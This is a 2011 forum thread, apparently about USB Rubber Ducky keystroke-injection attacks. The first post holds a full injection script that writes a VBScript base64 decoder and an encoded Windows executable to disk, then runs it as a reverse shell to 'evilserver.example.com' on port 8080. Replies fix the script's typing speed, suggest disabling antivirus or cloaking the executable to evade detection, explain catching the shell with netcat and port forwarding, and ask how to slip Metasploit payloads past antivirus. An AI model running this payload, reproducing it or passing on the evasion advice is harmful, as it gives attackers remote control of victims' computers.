Jose B Posted October 9, 2011 Posted October 9, 2011 Any one else having trouble with the Reverse Shell Payload When It runs the 2 copy cons work, but when it gets to the csript I get the error c:\decoder.vbs(2 ,32) Microsoft VBScript compilation error: Expected end of statement Here's a Screenshot of cmd.exe when the error occurs: http://cl.joseb.me/AnTM Script used in the payload: (The only difference from the one in the wiki is the DELAYS I added to take the screenshot) ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 600 LEFTARROW ENTER DELAY 400 STRING copy con c:\decoder.vbs ENTER STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0) STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = STRING CreateObject("Scripting.FileSystemObject"): ENTER STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function STRING decodeBase64(base64): ENTER STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"): STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub STRING writeBytes(file, bytes):Dim binaryStream: ENTER STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1: STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub ENTER CTRL z ENTER STRING copy con c:\reverse.txt ENTER STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA ENTER STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA ENTER STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS ENTER STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA ENTER STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2 ENTER STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A ENTER STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA ENTER STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA ENTER STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq ENTER STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF ENTER STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv ENTER STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp ENTER STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm ENTER STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A ENTER STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s ENTER STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9 ENTER STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp ENTER STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY ENTER STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B ENTER STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk ENTER STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA ENTER STRING AAxAAADpdL7//wAAAAIAAAAMQAAA ENTER CTRL z ENTER DELAY 1500 STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe ENTER DELAY 1500 STRING c:\reverse.exe evilserver.example.com 8080 DELAY 2000 ENTER DELAY 2000 STRING exit ENTER Quote
ascorbic Posted October 9, 2011 Posted October 9, 2011 (edited) Take a look at the screen shot you posted. Right before the first CONTROL Z you can see the VBScript for decover.vbs did not finish being copied. Here is the last line STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub The output was only STRING binaryStr This could have happened because something took focus away from the command prompt. Or, what I have been seeing in my testing is sometimes the ducky pushes strings out too quickly and the machine receiving them can't keep up. I added a STRING_DELAY which will slow down the output of strings to iducke.com, give this script a try. http://www.iducke.com/Encoder/IDE/b Edited October 9, 2011 by ascorbic Quote
Jose B Posted October 10, 2011 Author Posted October 10, 2011 Yep, It works great now! Thanks :D Quote
cgsilvers Posted October 18, 2011 Posted October 18, 2011 McAfee Antivirus picks this up as: Artemis!347446FE82BF (Trojan) Any way around this? Thanks, Quote
Xcellerator Posted October 18, 2011 Posted October 18, 2011 Disable your AV? Or maybe implementing a cloaked EXE to hide it? Quote
Sl1m Posted October 27, 2011 Posted October 27, 2011 Hi guys ! I'm such a Newb :P but can anyone explain to me how to establish a session with the target computer once the the payload has been injected! I have no idea how this works! Do you have to specify the ip address of your remote computer ( the one you are using to access the target computer) and also what what do you have to change on the script before converting it to a bin file ! Excuse my newness Thanks Quote
devenv Posted October 27, 2011 Posted October 27, 2011 Hi guys ! I'm such a Newb :P but can anyone explain to me how to establish a session with the target computer once the the payload has been injected! I have no idea how this works! Do you have to specify the ip address of your remote computer ( the one you are using to access the target computer) and also what what do you have to change on the script before converting it to a bin file ! Excuse my newness Thanks It's stated in the code: STRING c:\reverse.exe evilserver.example.com 8080 @wiki you can find how you can setup the receiving end. Quote
Sl1m Posted October 27, 2011 Posted October 27, 2011 It's stated in the code: STRING c:\reverse.exe evilserver.example.com 8080 @wiki you can find how you can setup the receiving end. thanks for the reply ! I am very unfamiliar with servers. how do i set up one ? sorry again thanks Quote
Sleven Posted October 27, 2011 Posted October 27, 2011 thanks for the reply ! I am very unfamiliar with servers. how do i set up one ? sorry again thanks You don't have to set up a server you could use your personal wifi router with netcat. You would use your public ip address and a port number above 1024. You will need to forward this port in your router and then listen for that port with netcat. I would suggest using this method for legal purposes. Quote
bobbyb1980 Posted October 28, 2011 Posted October 28, 2011 Anyone get a working metasploit payload past an AV? I know you can use shellcode to do that but doesn't the victim need to have software installed to run that shellcode? Has anyone tried implementing a Java click jacking style attack to avoid AV detection? Quote
Xcellerator Posted October 28, 2011 Posted October 28, 2011 Depends on the AV. I use Avast and while in a testing environment, I have to disable it to get any payloads past it. Perhaps that's a good thing? ;) Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.